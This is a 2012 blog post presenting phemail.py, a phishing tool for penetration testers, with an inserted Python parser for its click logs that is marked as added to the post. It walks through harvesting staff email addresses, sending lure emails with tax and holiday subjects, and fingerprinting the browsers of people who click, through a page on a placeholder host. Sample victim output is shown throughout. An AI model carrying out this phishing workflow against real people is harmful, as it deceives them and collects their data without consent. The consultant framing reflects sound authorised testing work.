Wednesday, August 15, 2012

Phemail.py - Another Social Engineering Tool!


Social Engineering is defined as the process of inducing people into giving away access or confidential information.

From a security consultant's point of view this topic is not new, and there are many tools that can be used against a target. Probably the most popular social engineering tool is SET (http://www.social-engineer.org/framework/…), the Social Engineering Toolkit. SET is a Python script which attempts to automate all the processes required during a typical client-side test. With SET you can send a phishing email containing a malicious URL. The malicious URL redirects the user to a web server managed by Metasploit, which launches several exploits against the victim's web browser in order to gain a Meterpreter shell. The problem with this approach is that most of the time Meterpreter will be detected by the antivirus software running on the victim's machine, so the exploitation will not succeed. Moreover, SET so far has no option to prove who clicked on the phishing email without using Meterpreter.


For this reason I started to develop phemail.py (Phishing EMAIL). The main purpose of this tool is to prove who clicked on the phishing email without attempting to exploit the web browser, while collecting as much information as possible. Because no exploit is delivered, it will be 100% undetectable by any antivirus, and it will obtain sufficient data for an initial proof of concept for the client.

The first step is to find corporate email addresses. Phemail has an option for harvesting corporate email addresses from search engines and saving them to a file, as shown in the example below:


# phemail.py -g1@example.com
Gathering emails from domain: example.com
100% Completed!
test@example.com
test2@example.com
[…]
emails.txt updated

Once you have corporate email addresses, the next step is to create a phishing email template. The template needs to contain the string “{0}” in each URL, as the script replaces this string with the correct URL automatically. A real example used during a client-side test is shown below:

Then you need to install PHP on the web server and copy the PHP file “index.php” (which you will find inside the package at the bottom of this article) into the web root directory. This file contains JavaScript code which attempts to collect web browser information and saves it in a log file in the /tmp directory.

After this you are ready to run the script, specifying with the option “-w” the web server where the PHP file “index.php” is uploaded, as shown in the following example:

# phemail.py -e test-emails.txt -f "Fast Holiday " -r "Fast Holiday " -s "Last Minute Holiday" -b body.txt -w http://YOUR-WEBSITE.com


SMTP server: mail.example.com
Sent to test@example.com
Error: sending to notExist-email@example.com
Phishing URLs point to http://YOUR-WEBSITE.com
Phemail.py log file saved: phemail-log-12-07-2012_15-42.txt

Then you need to wait: if someone clicks on the link in the phishing email, you will receive web browser information from the victim, as below:

Email: test@example.com
Date: Thu 12/07/2012 11:00:13
IP: 192.168.0.123
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1
appCodeName: Mozilla
appName: Netscape
appVersion: 5.0 (Windows)
appMinorVersion: undefined
product: Gecko
cookieEnabled: true
cpuClass: undefined
onLine: true
opsProfile: undefined
userProfile: undefined
language: en-US
platform: Win32
systemLanguage: undefined
userLanguage: undefined
flash: Enabled
Plugins:
Google Update
Shockwave Flash 11.3 r300
Google Talk Plugin Video Accelerator version:0.1.44.16
Version 3.1.4.8140
5.1.10411.0
Adobe PDF Plug-In For Firefox and Netscape 10.1.3
NPRuntime Script Plug-in Library for Java™ Deploy
Vmware Remote Console and Client Integration Plug-in
BlackBerry WebSL Browser Plug-In
Bing Bar
The plug-in allows you to open and edit files using Microsoft Office applications
Office Authorization plug-in for NPAPI browsers
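The log records above are what a consultant turns into the client report. As an added example (not part of phemail.py or of the original post), the following Python parses that record layout, assuming exactly the format printed above (one “Key: value” per line, a “Plugins:” line followed by one plugin per line, records separated by a blank line), and summarizes who clicked and which client-side software each click exposed; the sample log is constructed.

```python
from collections import Counter
# Constructed sample in the log format shown in the post (not real captured data).
SAMPLE_LOG = """\
Email: test@example.com
Date: Thu 12/07/2012 11:00:13
IP: 192.168.0.123
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1
flash: Enabled
Plugins:
Shockwave Flash 11.3 r300
Adobe PDF Plug-In For Firefox and Netscape 10.1.3

Email: test2@example.com
Date: Thu 12/07/2012 11:05:41
IP: 192.168.0.124
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1
flash: Disabled
Plugins:
Shockwave Flash 11.3 r300
"""

def parse_records(text):
    """One dict per click: 'Email:' opens a record, 'Plugins:' opens a list that runs to the next blank line."""
    records, current, in_plugins = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Email:"):
            current = {"plugins": []}      # new record; plugin list starts empty
            records.append(current)
            in_plugins = False             # guard against records not separated by a blank line
        if current is None or not line:
            in_plugins = False             # blank line closes the plugin list
            continue
        if line == "Plugins:":
            in_plugins = True
        elif in_plugins:
            current["plugins"].append(line)
        else:
            key, _, value = line.partition(":")   # split only on the first colon (Date/UA contain more)
            current[key.strip()] = value.strip()
    return records

def summarize(records):
    """What the report needs: who clicked, plugin inventory across clicks, and how many had Flash enabled."""
    clicked = sorted({r["Email"] for r in records})
    plugins = Counter(p for r in records for p in r["plugins"])
    flash_enabled = sum(1 for r in records if r.get("flash") == "Enabled")
    return {"clicked": clicked, "plugins": plugins, "flash_enabled": flash_enabled}
```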


The code is available for download as phemail.zip.


Steps to use Phemail.py:
  1. Find corporate email addresses: Phemail has an option for harvesting corporate email addresses and saving them to a file. Phemail.py leverages Google to search LinkedIn for corporate e-mail targets.
  2. Create a phishing email template: you create your own custom phishing templates. Do not forget to add the string “{0}” in each URL, as the script replaces this string with the correct URL automatically.
  3. Host/upload a single PHP file: this file contains JavaScript code which attempts to collect web browser information and saves it in a log file in the /tmp directory.
  4. Run phemail.py, pointing “-w” at the web server hosting the PHP file, as shown in the following example:
    # phemail.py -e test-emails.txt -f "Tax report " -r "Tax Report " -s "Important information about your tax" -b body.txt -w http://YOUR-WEBSITE.com
Then all you need to do is wait and hope the victim clicks on the phishing email, allowing you to gain web browser information from the victim as shown above.

When it comes to Python dependencies, the open source phemail.py requires pyDNS and BeautifulSoup in addition to the standard modules smtplib, base64, os, sys, getopt, urllib2 and re.
